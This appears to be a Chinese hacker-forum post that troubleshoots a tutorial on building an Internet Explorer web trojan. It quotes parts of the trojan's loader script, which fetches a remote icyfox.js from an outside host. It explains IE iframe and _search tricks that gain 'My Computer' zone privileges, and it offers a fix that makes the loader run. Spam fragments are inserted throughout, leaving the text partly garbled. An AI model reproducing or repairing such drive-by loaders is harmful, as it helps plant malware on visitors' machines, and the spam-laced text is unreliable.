来源:黑基论坛

    都原创偶也原创，嘿嘿

    “打造完美的ＩＥ网页木马”-------http://bbs.hackbase.com/viewthread.php?tid=2705719&fpage=1

    这篇精华大家都看了吧，有人说很好收藏了，有人说根本没用，

“打造完美IE木马”的纰漏

。这到底行不行呢？

上海龙凤1314 shlf    现在我来说说我实验后的看法：

上海龙凤1314 shlf    我们按他说的做：一个HTM，一个JS。大家看愿文的HTM部分：

    ============================================

   

   

   

   

   

   

   

   

上海龙凤1314 shlf    //此处设置上面icyfox.js文件的网络地址

    //请把http://www.godog.y365.com/wodemuma/icyfox.js改为你的icyfox.js文件实际上传地址

    jsurl="http://www.godog.y365.com/wodemuma/icyfox.js".replace(/\//g,’//’);

上海龙凤1314 shlf    WIE=navigator.appVersion;

    if(WIE.indexOf("MSIE 5.0")>-1){

    /*IE 5.0利用iframe标签,src属性设为icyfox://则会使此标签具备“我的电脑”域的权限,原因是因为icyfox://是不存在的协议，所以会ＩＥ会利用res://协议打开SHDOCLC.DLL中的语法错误页syntax.htm，而且SHDOCLC.DLL又位于系统目录中，为在 icyfox.js中得到ＷＩＮＤＯＷＳ系统目录和系统盘提供数据；*/

    document.write("<\/iframe.>");

    setTimeout("muma0()",1000);

    }

    else {

    ===================================

上海龙凤1314 shlf    大家看这里

上海龙凤1314 shlf    原文中  “//请把http://www.godog.y365.com/wodemuma/icyfox.js改为你的icyfox.js文件实际上传地址

    jsurl="http://www.godog.y365.com/wodemuma/icyfox.js".replace(/\//g,’//’);  “  最后的replace(/\//g,’//’); 我想可能是作者的失误，要不就是我的机器问题了，如果直接打开这个HTM是不会想作者说的引用icyfox.js的，这里有点小问题--------replace(/\//g,’//’);这句话的意思是把全部的”/“用”//“取代，

电脑资料

《“打造完美IE木马”的纰漏》(http://gdyhdog.com)。这里应该该为-----replace(/\//g,“//”);看出区别了吗？ 把单撇该为引号， 否则浏览器是会报错而不能转向ICYFOX.JS

    改了后IE自动打开 icyfox/// (如果你是没改JS文件名的话)

上海龙凤1314 shlf    我是IE6.0SP1，还是打不开木马程序。作者说“/*IE 5.0利用iframe标签,src属性设为icyfox://则会使此标签具备“我的电脑”域的权限,原因是因为icyfox://是不存在的协议，所以会ＩＥ会利用res://协议打开SHDOCLC.DLL中的语法错误页syntax.htm，而且SHDOCLC.DLL又位于系统目录中，为在 icyfox.js中得到ＷＩＮＤＯＷＳ系统目录和系统盘提供数据；*/ ”“/*IE5.5、 IE6.0则利用_search漏洞，把打开的地址设为icyfox://，从而使_search搜索框具备“我的电脑”域的权限，因为在IE6.0中无法用上面的iframe漏洞，IE5.5应该可以用，我没有测试。这样做的结果会打开搜索栏,有点遗憾!*/ ”

    我没法实验，我的浏览起并没用res://协议打开也没打开搜索栏，用Microsoft.XMLHTTP控件也不成功。

    就是这些，希望我说的是对的，给实验的朋友一些帮助，呵呵